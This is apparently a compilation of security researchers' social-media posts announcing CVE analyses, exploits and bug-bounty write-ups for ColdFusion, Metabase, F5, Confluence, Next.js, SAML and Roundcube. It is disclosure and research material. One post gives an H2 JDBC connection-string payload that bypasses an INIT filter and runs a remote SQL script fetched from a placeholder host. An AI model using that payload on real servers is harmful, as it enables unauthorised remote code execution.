New blogpost! In this post we analyse CVE-2023-29300, a pre-auth RCE in Adobe ColdFusion via unsafe Java Reflection invocation. blog.projectdiscovery.io/adobe-coldfusi…

⚠ Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - nux.gg/adobe-coldfusi… #AdobeColdFusion #CVE-2023-29300 #CVE-2023-38203 #CVE-2023-38204

The Metabase pre-auth RCE is interesting. While the entry point is straightforward, the process of exploitation is fun. We suspect we might have exploited this in an unintended way. We'll wait for Assetnote's blog, based on that we may or may not publish our analysis.

Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character: mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\; Great find!

Here is the #exploit that targets the "VMWare Aria Operations for Networks" which has CVSS 9.8 and targets all the versions from 6.0 to 6.10 (CVE-2023-34039) 🔥 I just wrote the exploit, but the discovery credit is for Harsh Jaiswal and Rahul Maini 👏 github.com/sinsinology/CV…

HTTP Request Splitting vulnerabilities exploitation offzone.moscow/upload/iblock/…

Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next time😴

Reproduced the CVE-2023-46747 F5 Big-IP RCE via AJP smuggling. Props to Praetorian for identifying this cool bug. Nuclei by ProjectDiscovery template dropping soon. Time to sleep😴 #f5-rce #CVE-2023-46747

Hello OgnlGuard/isSafeExpression, we meet again 🤝 🥲 Confluence OGNL Injection.

As the PoC is almost out, we are now publishing our analysis.

Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! blog.projectdiscovery.io/hello-lucee-le…

Check out my write-up on a seemingly harmless and limited send() in GitHub (CVE-2024-0200) and how it could be used to obtain environment variables from a production container and to achieve remote code execution in GitHub Enterprise Server: starlabs.sg/blog/2024/04-s…

Enjoy our next blog post this time an SQL Injection on Apple’s Infra. Another win nets us a $25,000 bounty! 💻💰 #AppleSecurity #Research #bugbountytips #bugbounty blog.projectdiscovery.io/hacking-apple-…

My colleague hashkitten and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on Assetnote's blog: assetnote.io/resources/rese…. Thank you to the Vercel team for a smooth disclosure process.

Checkout our new blogpost! In this post we talk about SAML and the recent Ruby-SAML Auth bypass. CVE-2024-45409: Ruby-SAML Auth Bypass in GitLab blog.projectdiscovery.io/ruby-saml-gitl…

Check out our latest blog post! We dive into GitHub Enterprise’s SAML implementation and explore an authentication bypass in encrypted assertion mode. CVE-2024-4985 / CVE-2024-9487: GitHub Enterprise SAML Authentication Bypass. projectdiscovery.io/blog/github-en…

I just published a new blog post sharing an improved Deserialization Gadget Chain for Ruby! It builds on the work of others, including Leonardo Giovanni, Peter Stöckli GitHub Security Lab and William Bowling @[email protected] nastystereo.com/security/ruby-…

New from us! Testing a Rails + Nginx app? This should be in your checklist. Read the blog to know how we disclosed Discourse database backups!

My research on CVE-2025-49113 is out. fearsoff.org/research/round…. Happy reading! #CVE #roundcube #poc FearsOff Cybersecurity

CVE-2025-49113 is a fascinating PHP Object injection in Roundcube webmail, a really nice find by the original finder. #roundcube #cve-2025-49113 #rce